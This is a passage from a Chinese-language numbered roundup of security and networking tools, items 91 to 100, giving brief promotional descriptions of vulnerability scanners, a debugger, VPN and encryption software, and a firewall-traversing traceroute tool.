一款基于TCP数据包的路由跟踪工具现代网络广泛使用防火墙,导致传统路由跟踪工具发出的(ICMP应答(ICMP echo)或UDP)数据包都被过滤掉了,所以无法进行完整路由跟踪。尽管如此,许多情况下防火墙会准许反向(inbound)TCP数据包通过防火墙到达指定端口,这些端口是主机内防火墙背后的一些程序和外界连接用的。通过发送TCP SYN数据包来代替UDP或者ICMP应答数据包,tcptraceroute可以穿透大多数防火墙。
九一、SAINT
安全管理综合网络工具,象Nessus、ISS Internet Scanner和Retina一样,也是一款商业漏洞评估工具。它以前是运行在UNIX系统之上的免费开源工具,但现在收费了。
九二、OpenVPN
是一个用于创建虚拟专用网络加密通道的软件包,允许参与建立VPN的单点使用预设的私钥,第三方证书,或者用户名/密码来进行身份验证。它大量使用了OpenSSL加密库以及SSLv3/TLSv1协议。能在Linux、xBSD、Mac OS X与Windows上运行。
九三、OllyDbg
简称OD。一个新的动态追踪工具,将IDA与SoftICE结合起来的思想,Ring 3级调试器,容易上手,己代替SoftICE成为当今最为流行调试解密工具。同时还支持插件扩展功能,是目前最强大的调试工具。
九四、Helix
是RealNetworks公司开发的功能强大的流媒体服务器产品,该产品不仅支持自身的“.rm”等媒体格式,还支持包括Microsoft的".wmv"、Adobe公司的".swf"等到多种常用媒体格式,是公认的优秀的媒体软件。Helix是多操作系统平台的服务器软件,在Linux和Windows中都有相应的版本,且管理界面类似。
九五、Bastille
当您在一台机器上安装Linux时,如何才能够让您的机器变得更加坚固,以减少被攻击的风险?或假如您已有相当数量的机器,如何能够在他们身上执行一致性的配置? 答案就是Bastille Linux。
九六、Acunetix WVS
黑客正在你的web应用程序上寻找跨站点脚本( XSS )漏洞,像购物车,表格,登录网页等动态页面很容易成为他们攻击的目标。Acunetix网络漏洞扫描工具可以帮您杜绝这些隐患。
九七、TrueCrypt
被称作全球最好的加密软件。是一款免费开源的加密软件,同时支持Windows Vista/XP, Mac OS X, Linux 等操作系统。主要特性:(1) 所有加密都是以分区为基础。(2)真加密,所有加密数据都是经过AES等加密算法的运算后的结果,无法破解(穷举法除外)。(3)能创建加密的“虚拟磁盘文件”(类似虚拟光驱,大小可以自定义)。(4) 加密单个分区或整个硬盘。(5)加密Windows系统所在的分区(启动Windows前需要密码)。(6) 加密过程自动、实时、透明(使用加密文件或分区前输入密码,载入后就可以像使用一个普通分区一样使用加密分区)。(7 )提供两级方案,以应对被强迫说出密码的情况(如抢劫);隐藏分区(覆盖式密码术,steganography)、隐藏操作系统; 无法探测到TrueCrypt 加密分区(加密数据会被认为是随机数据)。(8)加密算法:AES-256、Serpent、Twofish。为取得更好加密效果,可同时使用两种或三种加密算法。操作模式:XTS。
九八、Rational AppScan
IBM Rational 提供了 Rational AppScan 解决方案,在 Web 开发、测试、维护、运营的整个生命周期中,帮助企业高效的发现、解决安全漏洞,最大限度的保证了应用的安全性,为企业发展提供了坚实的技术保障。
九九、N-Stealth
世界上顶尖的WEB服务器安全扫描工具N-Stealth。据说能扫描与辨别出30000种安全漏洞与配置问题。不过免费版本大打折扣,漏洞扫描确认数目只有16000种。
一百、MBSA
Microsoft 基准安全分析器 (MBSA) 可以检查操作系统和 SQL Server 更新。MBSA 还可扫描计算机不安全配置。检查 Windows 服务包和修补程序时,它将 Windows 组件(如 Internet 信息服务 (IIS) 和 COM+)也包括在内。MBSA 使用一个 XML 文件作为现有更新的清单。该 XML 文件包含在存档 Mssecure.cab 中,由 MBSA 在运行扫描时下载,也可下载到本地计算机上,或通过网络服务器使用。